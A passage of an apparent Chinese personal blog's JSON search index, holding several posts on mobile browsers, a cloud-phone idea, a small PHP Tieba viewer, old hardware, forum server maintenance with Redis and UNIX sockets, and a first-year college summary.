不过没过几天我偶然看见了一个浏览器，叫做Via，大小只有几百KiB，功能还比Firefox Lite多。这时候我就没理由不换浏览器了。   换成Via后发现这个功能比我想象的更多，不仅主页可以自定义，而且可以自定义UA、查看源代码、屏蔽广告，也可以装插件，这个功能甚至比Firefox本身都多了，大小还小了几十倍。   不仅如此，里面的插件完美的解决了贴吧的问题，这再一次打击了我写垃圾代码的信心lol。   然后我觉得我以后应该不会再换浏览器了。技术分析我实在是不能理解某些大厂的做法，像华为自带的浏览器是UC提供的，内核还是Webkit，小米的浏览器是直接是Chromium套了层壳，顺便还加了一堆广告，结果Chromium还是32位的。而腾讯系的软件也是，搞的什么X5内核，结果还是基于Webkit的，越改越烂。   明明谷歌为Android系统配了WebView，为什么就不能好好用呢？这个WebView基于的还是最新的Chrome呢，全球最先进的浏览器，这些厂商非要自己瞎搞，增加了空间还降低了性能，然后还不符合标准，真不知道他们到底在搞什么。   像Firefox Lite和Via浏览器就是基于WebView的，空间又小，性能又好，而且到时候升级只用升WebView就OK了。后来我发现用腾讯X5内核的还不只是腾讯系软件，连哔哩哔哩居然都在用？真是可耻啊！不过还好这个内核腾讯还留了一个后门，好像是http://debugtbs.qq.com，用这个就可以不使用X5内核而改用WebView内核了。   感觉真是不理解国内的某些互联网公司在搞什么操作，也许就是这个原因，Firefox才会为中国和印度提供特供版的浏览器吧23333" },{ "title": "关于对未来手机的想象", "category": "", "tags": "未来, 手机", "url": "/2020/02/15/phone.html", "date": "2020/02/15", "content": "我听说洗澡的时候思维最发散（笑）起因前两天小米10发布了，看着那最高将近6000CNY的手机我沉默了……   昨天我在洗澡的时候正好就在想关于手机的事，手机越来越贵看起来似乎成为了趋势，当然对于小米10Pro来说，它的技术是应该值那样的价钱。但是我觉得这不应该是未来手机的发展，未来的手机绝对不是将越来越多的东西堆到一个砖头大的小盒子里，于是在我洗澡的时候就回想起了以前对未来设备的想象。对手机与性能的看法因为以前做过Telnet BBS，所以我对Telnet与当时的历史了解的也比较深。我听说以前的电脑算力十分的差，当人们需要计算一些比较复杂的东西就会通过Telnet连接到算力更强的电脑上去计算那些东西。但是随着现在个人电脑的计算能力越来越强，以及对于安全性的需要，Telnet成为了历史的记忆。   像我的服务器才1h1g，而现在买到的电脑甚至都可以是几十核，真的是不能比……不过对于手机来说，配置再高的手机，运算能力也完全比不过电脑，毕竟功耗在那里放着，电脑里可以搞一个巨大的风扇，或者是一套复杂的水冷系统。但是手机主要还是便携性，搞一堆复杂的散热系统也不现实，就更不用说供电的问题了。   让手机有着更好的性能从这个角度来看似乎是没有意义的，更好的性能要么更耗电，要么就用更好的生产工艺与设计，然而这样会更贵……所以我觉得手机向着更好的性能发展是不合理的发展趋势。   综上所述，我觉得可以把手机的算力设计到很低，这样无论从耗电发热还是从成本来说都很低。然后让手机去连接运算能力更强的服务器，在那个上面去运行需要用到运算能力的程序，这样我们就可以去掉手机上所有的散热设备，以及各种各样的附件，用以增大电池的空间，或者让手机更薄。   我之所以这样想主要还有一个原因，那就是旧手机的问题。我有一部5年前的华为麦芒4，它的CPU是骁龙616的，算力十分垃圾，被淘汰是应该的。但是它的屏幕是1080P的屏幕，和我目前使用的红米K20Pro的屏幕像素密度差不多（虽然材质不一样）。即使到现在，大多数的旗舰机也都使用的是1080P的屏幕。既然如此，这个屏幕还是完好无损且同样更得上时代的情况下仅仅是因为处理器过时了就被时代淘汰了，不是显得浪费吗？未来的手机：云手机所以我想了一种新的手机设计方案，那就是云手机。虽然云手机的理念提出了很长时间，但是不知道为什么出的都是为电脑工作的云手机，而不是真正为手机服务的云手机。或者说仅仅做为单独的应用使用的云手机，比如云存储还是什么云服务啥的……总而言之，目前的云手机完全没有融入使用者的生活，仅仅是作为一种辅助。   如果说可以制造一种手机，主要的成本全部在屏幕和电池上，然后这个手机在没有联网时唯一能做的就是打电话，而联网时连接到远程服务器上就可以像正常的手机一样上网聊天打游戏，所有的操作全部由服务器进行运算，然后通过远程桌面的协议在手机上进行表达。   现在的远程桌面协议已经很多了，像什么VNC、RDP还有什么SPICE，所以说我觉得从技术上来说，服务器负责运行程序，而手机只负责控制与显示，这样手机也不再耗电，可能充一次可以用个两三天，在打游戏时也不再发烫和卡顿（网络原因除外），而且也可以根据自己的需要得到相应的配置，价格也会更加便宜。设计内容  关于服务器的配置     现在的虚拟化技术也非常成熟了，什么弹性计算之类的也做的很不错了。像大多数时候当人们不再使用手机的时候手机事实上是在空载状态的，最多就是聊天信息需要随时到达。那么大多数情况我们的手机可能只需要一核CPU就可以满足需要，对于ARM的CPU，一核的运行成本应该很低吧？而在人们打游戏的时候需要的更多核服务器也可以想提供多少就能提供多少吧？而且这个还能挂机。那么我们就可以进行定价，比如手机平时使用一核，突发性使用四核，这个成本也没多高，1天1CNY应该也不亏吧？或者根据实际使用计算价格，一年下来可能也就花个400CNY左右吧？这也不算贵嘛，正常买一部高性能手机也要花2000-3000CNY吧？但是实际用个2-3年也就淘汰了嘛。  关于手机的设计     现在的手机主要成本屏幕占的应该也不算太多，换个屏幕也就300-400CNY左右吧？我觉得主要成本应该还是在主板上。但是如果说这个主板除了联网打电话，加个定位和WiFi，顺便来个5MP能扫码的后摄应该也没多贵吧？200CNY总能拿下吧？想拍照为啥不买微单呢？电池就更不用说了，200CNY买个4000mAh的电池应该轻轻松松吧？700CNY出一个超长待机，屏幕又大又清晰的手机即使对于山寨机来说都是轻轻松松吧？700CNY的手机如果说加上每年400CNY的云手机费用性能能和目前4000CNY的手机相比那我觉得还是挺划算的吧？最终成本也不高，消费者也能负担的起，然后服务商也能持续从消费者那里拿钱，岂不美哉？附加的优点我们也不一定只提供Android系统，同样如果有必要也可以提供Windows系统，顺便卖个没有运算能力的平板和电脑盒子，系统可以互相相互连接，在平板上既可以操作手机的系统，随时也可以操作电脑的系统，两个系统硬盘可以相互访问，也就没必要再导来导去的了。毕竟这时候手机、平板、电脑都成为了真正意义的终端，一切服务都在服务器上完成。   还有一个优点，这时候终端的网速将不再重要，重要的是与服务器连接的稳定性，服务器本身的带宽自然是超级大，毕竟连的都是光纤，延迟也极其的小，实际的延迟在于终端操作与服务器的延迟上，不过我觉得随着现在网络的发展，家里的延迟由WiFi6去缩小，家外的延迟由5G去缩小，最终一定能得到与原生一般的操作体验。我的计划如果说在我大三的时候这样的手机还没有出现在市场上，我就有了创业的冲动（突然理解了为什么大学生想出去创业），想办法去拉众筹、投资与贷款，然后看看自己能不能搞到人脉，去和华强北的大佬们一起研发出这样的手机23333   如果真的能造出这样的手机以及这样的服务，我觉得一定会有市场的。" },{ "title": "如何不使用贴吧App查看贴吧", "category": "", "tags": "贴吧, PHP", "url": "/2020/02/10/tieba.html", "date": "2020/02/10", "content": "为自己手机的最后一片净土而战(ง •_•)ง起因由于某些原因，我还是很想上百度贴吧看看的。虽然一些大公司很流氓，但也正因为他们是大公司，所以积累的信息才更多……    一年前，我因为使用百度搜索时打不开搜索内容，所以不得不使用了一些办法来解决这个问题。不过看起来百度也知道自己这么做是在砸自家招牌，所以后来这个问题百度貌似他们自己解决了。   而现在呢，我又因为某些原因需要使用百度贴吧，当然安装贴吧App就是在侮辱我的手机。一般来说，遇到这个问题只要用桌面版的贴吧就好了，但是很遗憾的是我用的浏览器是基于WebView的Firefox Rocket，不支持更改UA……既然如此，我只好运用我编程的技能解决这个问题了。解决方案在正常情况下用手机看贴吧的贴子是看不到全部内容的，只能看到前两楼，当然这样的贴吧就是废物，要想看剩下的内容就需要下载贴吧App了。不过以前贴吧有一个极简版，虽然很简陋，但是也够用了。然而很糟糕的是，百度他们不允许极简版列出贴子的标题了，如果用极简版看贴吧的话是看不到贴子的列表的。   不过如果知道贴子的ID，貌似还是能正常打开的，所以我们只需要获得到贴子的列表和ID就OK了。   经过我的研究，只要在http://tieba.baidu.com/mo/q-----1----/m?kz=后面加上贴子的ID就能看到贴子的全部内容，只是这个貌似不能发帖，不过我也不需要这个就是了。   于是我参考了以前Iwara Viewer的代码，写出了最终的代码。代码<?phpif (isset($_GET[\"kw\"])) {if (!isset($_GET[\"pn\"])) {    $_GET[\"pn\"] = 1;}$url = 'https://tieba.baidu.com/f?kw='.iconv(\"utf-8\",\"gb2312\",$_GET[\"kw\"]).'&pn='.($_GET[\"pn\"]-1)*50;$str = file_get_contents($url);$preg='/<a rel=\"noreferrer\" href=\"\\/p\\/(.*?)\" title=\"(.*?)\" target=\"_blank\" class=\"j_th_tit \">/is';preg_match_all($preg,$str,$match);//在$str中搜索匹配所有符合$preg加入$match中echo \"<title>Mayx Tieba Viewer</title><h1>Mayx Tieba Viewer</h1><hr />\";if ($http_response_header[0] != \"HTTP/1.0 200 OK\"){    echo \"<b>Warning</b>:It's Not Tieba Name<br>\";}for($i=0;$i<count($match[0]);$i++)//逐个输出超链接地址{    echo \"<a href=\\\"http://tieba.baidu.com/mo/q-----1----/m?kz=\".$match[1][$i].\"\\\">\".$match[2][$i].\"</a><br>\";}echo \"<hr><a href=\\\"?pn=\".($_GET[\"pn\"] + 1).\"&kw=\".$_GET[\"kw\"].\"\\\" >Next Page</a>\";} else {echo '<title>Mayx Tieba Viewer</title><h1>Mayx Tieba Viewer</h1><hr><form action=\"\" method=\"get\">Please Input Tieba Name:<input type=\"text\" name=\"kw\" required><input type=\"submit\" value=\"Submit\"></form>';}虽然说用JavaScript貌似也可以做到，可惜我学艺不精，只好用PHP解决了。演示https://yuri.gear.host/tiebaview.php后记P.S.这个东西是专门为了手机设计的，所以电脑完全没必要使用这个看帖子。   另外就是希望百度做个人吧……HTML肯定是能实现相应功能的，非要人下载App，虽然我也知道是为了利益，但是这真的是太恶心了……另外……知乎也一样，太恶心最终一定会流失掉用户的。真相我不知道的是很多的小程序上也有贴吧，像微信上也有，白做了😂……算了，就当练手+氵一篇了23333" },{ "title": "过去与未来的科技变化", "category": "", "tags": "科技", "url": "/2020/02/02/old.html", "date": "2020/02/02", "content": "回忆了一下，总感觉最近的科技没有什么变化啊……起因最近由于什么冠状病毒之类的事也不能出门，只能在家里宅着。不过我并不讨厌在家里，网络中有那么多事情可以看，计划有那么多没有实行，我怎么会担心无聊的事呢？那些在网络中天天说在家有一种像狗一样想往外跑的冲动 ，那可能他们是真的狗23333 那可能他们日常的生活中也没什么乐趣吧。    不过天天抱着手机打游戏还是看视频也不太合适，总想干些什么事，看着家里人翻出了几十年前的相片，突然想起来家里还有一台大约有20年左右历史的电脑，正好在这次找相片的时候有了找这台电脑的思路，结果当然也是找到了。那既然想到找旧电脑，不如把旧手机也一起翻出了看看吧。试用过去的设备那台古老的电脑在翻出来的所有设备中，可能生产日期最早的就是那台古老的电脑了吧，我看了一下版权信息都是2001年的。那台电脑的型号是华硕M1300，处理器是Pentium III，有128MiB的运行内存和20GB的硬盘。这个配置可以说是相当的古老了，它甚至还配备了一个外置的软盘驱动器。   这台笔记本的接口也看起来都很古老，除了一个USB1.1的接口和VGA接口在现在还能见到外，其他的接口我几乎都不认识。我只能看到有一堆针口的应该是一个并行接口，另外还有一个看起来有点像电路板上的BTB接口一样的接口，也不知道是干什么的……除此之外我还认识一个1394接口，以及电话线和网线接口，不过现在的我都找不到除了使用USB接口以外的设备了，不用说那些奇奇怪怪的并口，想想连MicroUSB接口都马上就要淘汰了，1394接口哪还能见得到啊。   除了接口以外，还有些奇奇怪怪的插槽，比如说PCMCIA插槽，我查了一下，这个东西就相当于给笔记本电脑用的PCI-E接口，在以前都认为是笔记本不可缺少的东西，可惜现在的笔记本电脑都趋向于轻薄化，占掉一大堆空间的PCMCIA插槽自然是没有了活路。   另外就是光驱，现在好多电脑上甚至连光驱都没有了……为的就是让电脑更加轻薄……这也算是科技的进步吧……   其他像红外线设备之类的我也没用过，所以也就不在这里多说什么了。   尽管这台电脑如此之旧，但是一个电子设备的寿命远超常人想象，它本来预装的是Windows98的系统，不过让它运行WindowsXP也是绰绰有余。按下开机键后，电脑就如同一架即将起飞的螺旋桨飞机一般呜呜的响了起来。不过开机速度还不错，我感觉不到15s就启动到桌面了。不愧是WindowsXP，还是一如既往的经典。   我在这台电脑上发现了一个看起来是5年前的日记，感觉还是挺有纪念意义的，于是就随手上传到了博客上。   另外这台电脑上没有无线网卡，上网是个很困难的事情，不过我在网上找了一个tetherxp.inf的配置文件，插上手机，倒是也勉强能用。不过这个WindowsXP上带的IE6也真的是彻底脱离了时代，很多网页都打不开，因为WindowsXP只支持TLS1.0以下的加密协议。也正是这个原因，所以我的博客在兼容性上兼容的是IE8。    虽然它看起来脱离了时代，但是毕竟作为那时候的生产力工具，办个公还是没有问题的，上面的Office2003依然可以正常使用。过了将近20年，绝大多数的办公人员依然使用传统的Office办公，包括学校在内，PPT仍然是旧版的.ppt格式，而不是.pptx格式。说不定学校的课件仍然是十几年前的课件，从来没有更新过。不过给学生教的东西嘛，倒是也没什么可以更新的，所以用着有历史意义的课件也是能理解的。从直板机到智能机我看了看翻出来的手机，一共有7部，没有一部是旗舰机……应该说还有些是山寨机，不过也很正常，毕竟以前的手机比较贵嘛，而且工资也不高，不像现在，几乎所有人都不会买低端机型，大多数人都使用的是旗舰机。   在这堆手机里，我看年代最早的是Nokia 2626，这个手机的充电口不是标准的充电口，不过没关系，我可以直接给手机电池充电。这部手机是2007年上市的，也不知道是什么原因，这部手机没有摄像头。这部手机唯一还比较有意思也就只有自带的类似于3D弹球的游戏。其他方面也没有什么更多有意思的地方了，在搜索引擎上搜索可以找到这个手机的更多信息。   除了上面所说的直板机，还有一个翻盖机，叫做步步高I508。即使作为音乐手机它播放音乐的水平还是比不上我现在仅仅是能听个响的手机。不过毕竟不是智能手机，能做到这样已经很不错了。   本来还想搞个滑盖机，不过剩下的手机基本上都是智能机了……智能机即使很老也因为使用的是安卓系统，也让我感受不到它的古老。在这堆手机里最老的是海信HS-T830，系统是安卓2.3.5。貌似是充话费送的，当时我用这个手机可是干了不少事，具体的事情可以在这里看到。   其他的手机就是一堆山寨机，什么优思还是什么酷派，全是一堆杂牌子，也就没什么好说的了。正在写博客的旧电脑目前我正在写博客的电脑是Dell D430，看起来是2008年上市的。配置还可以，处理器是Core 2 Duo，有2GiB的运行内存和120GB的硬盘，预装的是WindowsXP，勉勉强强能带起来Windows7。   虽然Windows7前几天停止了维护，不过既然WindowsXP都能正常使用，Windows7有何不可呢？这台电脑基本上和现在的电脑差不多了，可惜还是没有HDMI的接口。不过自带无线网卡还是挺不错的，至少正常上网没有什么问题，2GiB的内存安一个Google Chrome还是绰绰有余的，所以我现在在这个上面写博客也丝毫没有问题。   另外我在这个电脑上发现了一个东西，它让我又一次的感受到了SEO的重要性，它的名字叫做pkmnEMU，貌似是以前下的据说是在暗网上的游戏，我在某搜索引擎搜索这个关键词时结果搜到了一本小说，看起来是一个丝毫不担心版权问题的科幻小说，偏偏我就喜欢这类的，于是很遗憾的我就入坑了😂……SEO……真的是太重要了……对于未来设备的看法从上面所说的设备来看，我感觉现在的科技似乎发展的没有那么快了。也许是期望过高，现在的设备变化并不大，唯一变化的就是更好的性能，更优秀的程序和更先进的应用模式。但是本质没有变，电脑还是那个电脑，手机还是那个手机。也许是厂家的兼容性让我误认为科技没有发展，又也许是某些厂家的垄断性让其他新的东西没有生产的机会。总之，现在科技的进步让我感觉就是挤牙膏，只有纵向缓慢的发展，没有横向大范围的跃进。   变化的总是一些平常人看不出来的地方，虽然像生物计算机和量子计算机仍然没有商业化，但是处理器的结构貌似已经和原来不一样了。尽管都是X86或X64以及ARM的架构，但是也许实现方式不一样了呢。不过具体到底有没有进步我真的是看不出来，只希望这些厂家厚积薄发，能让我感觉到质的变化吧。   未来的设备我无法想象，可能真的不再在硬件上做进步，像现在大多数公司都更愿意在软件上进行改进，像什么云计算之类的，也就是一些新的概念，不过基础没有变，软件不过是在原有的基础上加东西，这倒也不是不能理解，毕竟要考虑到兼容性，不能为了新的东西就不顾旧的东西。像HTTP/3，它就是为了兼容性才用了UDP协议作为底层。不过令我感到糟糕的是DoT/DoH，之所以使用UDP作为DNS协议的底层不就是为了快速嘛，结果它还来一个在TCP上加密，那样延迟怎么下的来？   像现在出现的5G网络也是不可思议，现在大多数家庭都达不到千兆网络，甚至许多网站服务器带宽也达不到千兆，5G到千兆网络有什么意义？在大多数时候需要用千兆的时候用光纤它不好吗，需要无线用Wifi6它不好吗？我实在是很难想到5G的实际用途。不过未来也很难预测，6G如果是运行在卫星上那当然是真的有意义，但是5G的发展目前我实在是想不明白，不过既然那么多专家都对5G抱有信心，那就看看它能怎么样吧。   不过这又让我回想起区块链了，前几个月区块链火了，仅仅是因为领导人说区块链很重要……不过几个月过去了我依然没看到这个区块链有什么应用。   我对未来还是抱有希望的，之所以我觉得现在发展变慢了，也许是我太着急了，再过几年吧，如果真的有质的变化，那么以后再回来看这篇文章也许就会感到人类真的还是有些能力的，但是如果没有发展，那我就看看我还能等到什么时候吧！P.S.今天是Github Archive Program的截止日期，我之前写了一篇文章介绍它。希望过了这个截止日期后Github能把我的博客收录到GitHub Arctic Code Vault里，这样我的博客说不定千年以后还有人能看到呢23333" },{ "title": "Mayx的运维笔记 - 应用优化", "category": "", "tags": "运维, 笔记, 优化", "url": "/2020/01/21/devops.html", "date": "2020/01/21", "content": "优化？能不负优化就够好了！继续优化！接着上一篇的重建，我在上一次做了一些系统环境上的优化，不过论坛中用的Discuz系统也算是一个成熟的应用了 （可惜再成熟也不会自己写代码😂） ，所以这次我打算在Discuz这个应用上做优化。   不过毕竟以我的PHP水平还做不到直接在源代码上进行修改，所以我打算使用Discuz本身有的优化功能上进行优化。关于图片处理库的优化在Discuz的后台面板中，我首先看到的关于性能优化方面的地方就是图片处理库 （尽管它不是最先出现的）。看旁边的介绍中说默认的GD库似乎更加消耗系统资源，而相比之下ImageMagick库会好一些，既然它都这么说了，那我肯定是毫不犹豫的选择了ImageMagick库嘛。   当然，事实上我也确实是这么做的，然而这个操作貌似发生了一些不可预料的问题。修改了这个选项后我开始逛论坛，但是我发现论坛中不少帖子的图片缩略图显示出现了问题，这时候我感觉不大对劲，首先我确定了一下，Vultr中的LEMP肯定是有装ImageMagick库的，那问题肯定不是我PHP环境的问题，这时候我怀疑是数据库保存的东西可能有问题。不过这个问题就超出了我的解决范围，没办法，我只好又把选项还原回去了😓，反正它这么多年也都过来了，应该影响没多大吧。关于缓存的优化在之前的花火学园中，我也用了Discuz的缓存，引擎是MemCache。事实上在LEMP默认是不提供MemCache的扩展，反倒是有Redis的扩展。不过我看着Redis那红色的图标，不知道为什么心里总有一种抵触感，后来经过了解，Redis似乎要比MemCache的性能好的多，我也就半信半疑的打算装一下试试。   不过事实上我并不怎么相信这种缓存能提升多少性能，只是看着网上说着各种加速到0.005s让人非常的心动。毕竟我的服务器内存并不大，总共也就1个G，另外还加了Swap。如果缓存占用的内存很多，分配来分配去又回到Swap所在的硬盘，那我优化岂不是失去了意义？不过心里总是被别人的博客搞的很羡慕，所以我开始研究怎么样搞Redis缓存。历经艰辛的Redis之旅Redis并不是很难安装，一句yum install redis就搞定了，主要难的地方还是在于配置。   我知道，这时候只要在Discuz的配置文件里加一句$_config['memory']['redis']['server'] = '127.0.0.1';然后再以默认的方式启动Redis服务就OK了。但是既然之前我说过，在内部的服务中不应该使用TCP/IP sockets，那我肯定是不能允许它就用默认的配置工作。   在Redis中倒是有支持UNIX domain sockets的选项，也支持关闭监听TCP/IP Port。我按照它上面的说明配置了，然后信心满满的在配置文件中设定好了。然而现实告诉我没那么简单，我写了一个测试脚本，它返回了一个No such file or directory？我反复确认路径，保证自己没有手残到把路径写错，然后上网搜这个错误，查了半天也没有什么有建设性的结果……我甚至把权限都设置为777，把php-fpm加到了redis的组里，都没有任何用处，另外我也用redis-cli确定了那个文件确实是一个socket文件。这时候我实在是无计可施了，我打算放弃，就这样屈服于TCP/IP sockets，然而我的强迫症和其他博客里中说的10ms不允许我放弃！没办法，我只好仔细思考了。   我觉得这个问题应该还是在于权限，只是这个问题过于奇妙，让我无法理解。按照默认的配置，那个socket文件在/tmp/文件夹下，因为PHP在上传文件的时候也用到了这个文件夹，所以我也没怎么怀疑它。但是我的mysql同样也用了UNIX domain sockets，只是文件在/run/下，它也没出问题啊，我想了想，也许把这个socket文件放到/run/文件夹下就可以正常工作了。没想到还真是这个问题，随着我把配置文件中的路径修改了，它也能正常工作了……我真的是无言以对……   在这之后，我把redis服务设置成了开机自启动，然后这段优化就到此为止了。其他的杂事其他也没什么特别多可以优化的地方，后来我查了一下，发现花火学园的请求在那天出现问题的时候请求量突然涨了一倍，也许是这个原因把之前的花火学园逼停了，所以优化还是挺重要的嘛。   其他方面就是对于Discuz权限的一些调整，不知道为什么，总有些人要在试贴区水贴，真的是无法理解它们的操作，另外就是连发贴的问题，我感觉估计有人用发帖机搞我们的论坛，所以又提高一点发帖的门槛。   其实这次也没什么大的改动，就是这个Redis搞的我真是当场爆炸，看来我还是要提高一下我的姿势水平啊23333。" },{ "title": "Mayx的运维笔记", "category": "", "tags": "运维, 笔记", "url": "/2020/01/05/devops.html", "date": "2020/01/05", "content": "新年新Bug！开端前天，我维护的花火学园宕机了，由于在上面安了乱七八糟的各种各样的东西，所以我以为它只是日常卡机，所以我就随手重启了一下。   重启完之后，它凉了，不知道为什么，数据库连不上了……于是我开始问另外一个同样可以登录服务器的人，问他有没有动过数据库，结果听起来貌似他好几个月都没登服务器了。于是我慌了，试着手动启动MySQL的服务，然而黑色的界面里冷冰冰的Job for mysql.service failed告诉我事情没有那么简单。我按照错误的提示查看了详细信息，然而里面也只是简单的记录了一句mysql.service: Main process exited, code=exited, status=1/FAILURE这样通俗而又简单的一句话……这和没说有什么区别……谁都知道它启动失败了……    没办法，这时候只能向网站的上一代运维求助了 （向大佬低头） ，经过大佬不知道什么样的操作，终于找到了真正的错误详细信息，看起来好像是数据库中的用户表出了问题。于是大佬重置了用户表，总算是勉强把MySQL服务重新启动了。   不过虽然这时候再做一些简单的配置，应该差不多就可以重新上线了，不过考虑了一下，为了让以后不会再出现乱七八糟的事，我打算把网站重新迁移一遍，让系统环境做一个大更新！重建的过程首先重新租一台服务器吧，之前用的是Ubuntu的服务器，现在一年过去了，也该考虑考虑稳定性的问题了，于是我把系统换成了CentOS。   然后为了之后配置起来方便一些，我依然决定使用服务器商已经配置好的LEMP应用，这样建好以后我也不用再考虑安装服务器软件的问题了。   在新的服务器部署的过程中，我回到原来的服务器，开始打包网站的数据库和文件，做好向新的服务器转移的准备。   没多久，新的服务器就部署好了，于是我直接一个scp就把所有的文件传到了新的服务器上。不得不说，服务器直接传输文件的速度是真的快，几个GiB的文件几分钟就传完了。顺便感叹一下，花火学园的数据居然也都好几个GiB了，想当年我接手的时候还不到2GiB。   然后就是导入数据库和解压网站文件，以及配置Nginx，完成以后，网站不出所料的可以正常使用了。   然后就是设置DNS之类乱七八糟的事，以及Cloudflare的CDN之类的，不过还好之前设置过防火墙白名单的配置，这次也方便了不少。   不过这还没完，既然换了新的服务器，而这一年里我对服务器的了解也更深了一些，至少应该做一些优化吧。   所以呢，我就先把BBR给装上了，搞太多东西也很麻烦，所以我就直接用了一键脚本。顺便又搞了Swap，毕竟服务器只有1GiB的内存，是应该多搞点内存，虽然可能速度会降低，但还是求稳嘛，而且服务器好像是SSD的硬盘，应该影响不大。   到这里，基础的环境部分我就自认为搞好了。之后的优化到了第二天，我又心血来潮，想再搞点别的东西来优化服务器，首先我的目标是把对内的TCP/IP sockets全部换成UNIX domain sockets，用UNIX domain sockets可以减少不少系统开销，所以我首先对PHP-FPM开刀。   其实改起来也很简单，就是把PHP-FPM的配置文件中的listen项从IP地址换成文件，然后把Nginx中的fastcgi_pass改成带unix:前缀的文件就OK了。我改完之后真就以为OK了，但是现实中的502 Bad Gateway打破了我的幻想，看来没那么简单……   后来我仔细看了一下PHP-FPM文件的注释，发现了一句警告：; WARNING: If you switch to a unix socket, you have to grant your webserver user;          access to that socket by setting listen.acl_users to the webserver user.哦哦，原来是要设置listen.acl_users……然后我把nginx加了进去，重启之后它就好了。   之后我打算优化一下MySQL，不过我也不是很清楚MySQL中怎么设置UNIX domain sockets，本来是打算就此放过，不过我听说好像数据库连接中用127.0.0.1要比localhost要好，因为少了一次解析。我听着感觉好像有那么点道理，然后就去把网站配置的数据库地址给改了。   不过后来发现查了一下，发现好像MySQL对localhost地址有特殊规定，在MySQL中如果使用localhost，那么连接就会走UNIX domain sockets，而使用127.0.0.1就会和平常一样走TCP/IP sockets。   看完之后我感觉有那么点不爽啊，然后就回去又把我的数据库地址改了回去，不仅如此，我还打算关掉3306端口，后来查了一下，发现在配置文件中加入skip-networking就可以了。   之后我查看了一下端口，除了443端口和我的SSH的端口外还有一个奇怪的25端口，看着感觉很不爽，查了一下是postfix的端口，然后我一个不爽就把postfix随手卸载掉了。   再往后，我看了看我的Nginx日志，发现大小有那么点不对劲，才建的服务器日志已经有400-500MiB了？！虽然花火学园平时流量不算小，但也不至于这么夸张吧？后来我发现我没有过滤静态资源的日志，之后又修改了一下配置文件，心里就舒服多了😁。   于是，花火学园的优化就到此结束。后记我其实应该仔细看看日志的，向莫名其妙出现的BUG说不定是攻击？ （被害妄想症23333） 后来我翻了翻日志好像也没这个倾向。   另外我确实不应该把正在开发中的项目和主站放在同一个服务器，至少鸡蛋也不应该放到同一个篮子里面嘛……这次我打算做好主站的所有配置，保证它的正常运行。" },{ "title": "年终总结", "category": "", "tags": "总结", "url": "/2019/12/31/summary.html", "date": "2019/12/31", "content": "Summary?没错，这里的位置就是Summary😂在大学的总结我可能以前也想不到我现在居然能坐下来安安稳稳的坐下来在这里写年终总结吧，以前的我肯定会认为我现在早就变成了一堆泥土然后再来一首《Ring of Fortune》作为BGM吧23333。当然有这个想法很正常，这应该也算是必经之路吧……   不管怎么说，今年能上到大学也算是不错了，至少可以借鉴以前的经验然后谱写新的篇章嘛，无论如何，变成泥土是谁都不想的事情，毕竟泥土可是不会写新的篇章的23333……开学时的事情在大学经过了一个学期，也大概的能感受到现实社会的一些残酷，但是也有些比较有意思的地方。比如说我在刚开学就被当作羊被拔了羊毛，某些人就是乘着新生不熟悉的时候坑我们，这也恰恰证明了生活的不易，无论是我们，还是他们。  具体被坑的……比如花了50CNY买了张没钱的公交卡啊，还有办了宣传时29CNY/mo但是实际上是59CNY/mo的宽带之类的。也许我以前可能被坑过，不过这几次坑是真的大坑……   在刚开学的军训我表现的不怎么好，我以为这可能会影响别人对我的第一印象，不过事实上嘛……其实也没人记得我，毕竟大家都穿着同样的衣服，尽管军训大家可能不会忘记，但是其中的细节也基本上没人追究了吧。   在开学时参加系中比较推荐的协会也算是一个走的不错的一步，首先我通过我的大忽悠忽悠会长给我的面试成绩一个满分，虽然对于同班的人这样也并没有什么意义，不过这样算是对系里的一种广撒网了，可以让一些人认识我。   虽然我是挺想出名，不过出名不是我的目的，这只是一个过程，开始的轻微的努力可以让之后少走弯路，这也算是一种可持续发展了吧。   另外，关于开学更多的事情，可以在开学总结里看到。   (P.S.本来这篇文章是打算在昨天写完的，结果晚上熄灯断电，只写到这里，所以只好在最后一天（真正的年终)写完了wwww）在学校的生活平时的生活在学校平时的生活还可以，除了上课和高中不同，以及在学校可以正大光明的玩手机之类的，平时的心情和高中是差不多的……其实也不应该这么说，毕竟高中基本上所有的时间都是有规划的，但是在大学没有。而且大一的课很少，所以感觉上还是和高中有很大区别的。    不过正是因为是这样悠闲的生活，才更容易导致事情积压在一起，因为很多时候都不会记得要干什么，只有到时间了才有那种着急的感觉。所以有些人会说自己很忙，只是因为确实在某一时间会突然很忙，就如同我的高中老师所说，一个作业给365天，那也只会在第364天去写一样，不到时间就没有驱动力啊……   在学校，一天通常只有2-3节课，有时候甚至一天只有一节课，所以空闲的时间是很多的。不过大多数情况在这空闲的时间也很难想着去干些什么实事，很多时候都在玩了……明明计划想做很多东西，但是即使一天都闲下来，也不会想着去做他们。不过有的时候做这些东西还是看心情，通常在有那种想要完成它的感觉时就会有驱动力去做它了。周末的生活到了周末那更是什么事情也没有，这时候很难会想着做些什么，只会在床上一直睡觉，以至于睡得都要倒时差了，说不定我现在去美国都不会有倒时差的不适了呢23333。    当然一直这么睡也不行，起来以后有的时候也会去和同学一起出去转转，一开始我们都想着去旅游景点看看，不过去旅游景点这种事貌似并不是我们喜欢的，只是想着反正是闲的时候，所以去旅游景点吧，但是旅游景点确实没什么意思，而且大多数地方还要门票，本来就没什么意思的事情又增加了门票的门槛，那就更加不愿意去了。   所以从我们转完美术馆、博物馆、科技馆以及图书馆之后，我们就开始去像正常人一样去转比较繁华的地方了。   像我是在成都上学，所以到周末就会想着去天府广场和春熙路这样的地方，那里确实是很繁华的地方，不过那里的东西并不适合我们这些没多少钱的人去转，比如IFS，那里也就能在里面转一圈，看看一堆从来没见过的品牌，顺便去看看那标志性的在楼上趴着的大熊猫，其他也没什么有意思的地方，所以之后我们只好在学校附近的商场玩了……   不过去商场也没什么好玩的地方，一般我们去商场也就是吃个饭或者逛逛超市之类的，再也就没什么可以干的事情，所以大多数情况我还是会在宿舍里一直睡着(lol)在学校的学习大一的科目不算多，也不是很难，不过我高中时学习并不怎么样，数学和英语都很烂 (Suck) ，所以大学的数学和英语对我来说也很难。   不过其余专业课相比来说就简单很多了，至少我还有一定的计算机基础嘛，虽然之前一直都没学过Python，不过至少编程的基本思想我还是有的，所以相比来说上手还是比较快的。前端中HTML都还是比较简单的，包括JS也是编程范畴的，都不算很难，也就CSS让我比较伤脑筋，虽然总体来说CSS的结构没什么复杂的，但是实际表现的效果是真的很难搞，因为首先我不知道用哪个属性，另外，属性名也不是很好记，而且实际产生的效果也可能和预期的不一样……也就这里相比较麻烦一些。   其他公共课……反正都很麻烦吧，像什么体育啦，人文素养啦，还有什么心理健康之类的，都是很麻烦的事情，尤其我的体育极其烂，所以这就更不好搞了……   